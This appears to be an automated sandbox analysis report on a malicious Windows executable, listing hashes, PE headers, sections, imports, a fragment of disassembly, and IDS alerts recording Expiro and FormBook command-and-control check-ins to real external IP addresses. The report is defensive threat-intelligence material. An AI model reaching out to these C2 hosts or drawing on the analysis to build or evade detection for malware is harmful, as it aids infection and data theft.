                                                                                      SSDEEP:12288:IEP3RFsV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:jFQVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                      MD5:BD4DB052E1A0C00732CCA12CCF6025F8
                                                                                      SHA1:93574FCD260C27B0C12781320A10196BAB31010E
                                                                                      SHA-256:2FA160E5F7ADCC8E539E3EEE286988207C212A2598E199FFA8E7D231CB184162
                                                                                      SHA-512:10DA0F472E316E53FDCC5DDC856C3F005728F01BB57329C369586364F1B3A92155AB8DFB20FDB0674F5D620FDED2EC9F988A00E9632E7511B8C91ED2ADCBF82E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.515582966108426
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:OVZizpEU7Q.exe
                                                                                      File size:1'786'368 bytes
                                                                                      MD5:b5c6ac313fa5167296fbe879f26c4e0f
                                                                                      SHA1:d03372158b51e7c5925b372758a52ea118d5e09b
                                                                                      SHA256:8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09
                                                                                      SHA512:ea32599268aff74c0244902d6378b96c8b43514b1ac8226a9c20f84395a00daec659208afb0c97266cd04eb8fed420bc32239a56e58d9f2f991b54afb06f6274
                                                                                      SSDEEP:49152:oW0c++OCvkGs9FaZZgBafcReY4gFIDRRAubt5M:DB3vkJ9ogAOecUf
                                                                                      TLSH:D985E02273DDC361CB669173FF29B7016FBB38614630B85B1F940D79A960172262DBA3
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x427dcd
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x675FB5F8 [Mon Dec 16 05:09:12 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                      Instruction
                                                                                      call 00007F0E8CD4ADCAh
                                                                                      jmp 00007F0E8CD3DB94h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F0E8CD3DD1Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F0E8CD3E07Eh
                                                                                      bt dword ptr [004C31FCh], 01h
                                                                                      jnc 00007F0E8CD3DD19h
                                                                                      rep movsb
                                                                                      jmp 00007F0E8CD3E02Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F0E8CD3DEE4h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F0E8CD3DD20h
                                                                                      bt dword ptr [004BE324h], 01h
                                                                                      jc 00007F0E8CD3E1F0h
                                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                                      jnc 00007F0E8CD3DEBDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F0E8CD3DECEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F0E8CD3DEADh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F0E8CD3DD1Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F0E8CD3DD23h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F0E8CD3DD75h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F0E8CD3DDC8h
                                                                                      Programming Language:
                                                                                      • [ASM] VS2013 build 21005
                                                                                      • [ C ] VS2013 build 21005
                                                                                      • [C++] VS2013 build 21005
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                                      • [RES] VS2013 build 21005
                                                                                      • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5da3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 9eabb8c7c6b5ac654f447d2b95283d23 | False | 0.5728679102422908 | data | 6.676135712344587 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5da3c | 0x5dc00 | 2b27632cf6daf83cd96bec484dfe0526 | False | 0.9294114583333334 | data | 7.898594879080545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0x96000 | 0x95000 | f6cef3e956d4181439cca9119a30ed0f | False | 0.975751428796141 | data | 7.9380325794644255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x54d01 | data | | | 1.0003339157668691
RT_GROUP_ICON | 0x1244bc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x124534 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x124548 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12455c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x124570 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12464c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T19:51:08.322943+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49739 | 54.244.188.177 | 80 | TCP
2025-01-10T19:51:08.387989+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49739 | TCP
2025-01-10T19:51:08.387989+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49739 | TCP
2025-01-10T19:51:59.687647+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49993 | 217.70.184.50 | 80 | TCP
2025-01-10T19:52:16.251612+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 154.23.184.207 | 80 | TCP
2025-01-10T19:52:19.076856+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 154.23.184.207 | 80 | TCP
2025-01-10T19:52:21.667451+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 154.23.184.207 | 80 | TCP
2025-01-10T19:52:24.180350+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49999 | 154.23.184.207 | 80 | TCP
2025-01-10T19:52:31.116320+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 38.165.29.234 | 80 | TCP
2025-01-10T19:52:33.663273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 38.165.29.234 | 80 | TCP
2025-01-10T19:52:36.210109+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 38.165.29.234 | 80 | TCP
2025-01-10T19:52:38.718025+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50004 | 38.165.29.234 | 80 | TCP
2025-01-10T19:52:44.231988+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 13.248.169.48 | 80 | TCP
2025-01-10T19:52:46.767778+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 13.248.169.48 | 80 | TCP
2025-01-10T19:52:49.323291+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 13.248.169.48 | 80 | TCP
2025-01-10T19:52:54.928853+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50009 | 13.248.169.48 | 80 | TCP
2025-01-10T19:53:01.207547+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 156.251.17.224 | 80 | TCP
2025-01-10T19:53:03.758559+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 156.251.17.224 | 80 | TCP
2025-01-10T19:53:06.289658+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 156.251.17.224 | 80 | TCP
2025-01-10T19:53:08.871146+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50013 | 156.251.17.224 | 80 | TCP
2025-01-10T19:53:14.544472+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 194.245.148.189 | 80 | TCP
2025-01-10T19:53:17.094264+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 194.245.148.189 | 80 | TCP
2025-01-10T19:53:19.753906+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 194.245.148.189 | 80 | TCP
2025-01-10T19:53:22.226767+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50019 | 194.245.148.189 | 80 | TCP
2025-01-10T19:53:28.544446+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50020 | 38.181.21.178 | 80 | TCP
2025-01-10T19:53:31.091227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 38.181.21.178 | 80 | TCP
2025-01-10T19:53:33.664998+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50022 | 38.181.21.178 | 80 | TCP
2025-01-10T19:53:36.178966+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50023 | 38.181.21.178 | 80 | TCP
2025-01-10T19:53:41.983812+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50024 | 185.104.45.157 | 80 | TCP
2025-01-10T19:53:44.516218+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50025 | 185.104.45.157 | 80 | TCP
2025-01-10T19:53:47.082130+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50026 | 185.104.45.157 | 80 | TCP
2025-01-10T19:53:50.554403+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50027 | 185.104.45.157 | 80 | TCP
2025-01-10T19:53:57.193009+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50028 | 209.74.77.107 | 80 | TCP
2025-01-10T19:53:59.570024+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50029 | 209.74.77.107 | 80 | TCP
2025-01-10T19:54:02.179232+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50030 | 209.74.77.107 | 80 | TCP
2025-01-10T19:54:04.620578+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50031 | 209.74.77.107 | 80 | TCP
2025-01-10T19:54:10.812551+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50032 | 147.255.21.187 | 80 | TCP
2025-01-10T19:54:13.396942+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50033 | 147.255.21.187 | 80 | TCP
2025-01-10T19:54:15.952941+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50034 | 147.255.21.187 | 80 | TCP
2025-01-10T19:54:18.487766+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50035 | 147.255.21.187 | 80 | TCP
2025-01-10T19:54:24.475560+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50036 | 185.68.16.160 | 80 | TCP
2025-01-10T19:54:27.008097+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50037 | 185.68.16.160 | 80 | TCP
2025-01-10T19:54:29.535162+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50038 | 185.68.16.160 | 80 | TCP
2025-01-10T19:54:32.152320+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50039 | 185.68.16.160 | 80 | TCP
2025-01-10T19:54:38.029241+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50040 | 194.195.220.41 | 80 | TCP
2025-01-10T19:54:40.584163+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50041 | 194.195.220.41 | 80 | TCP
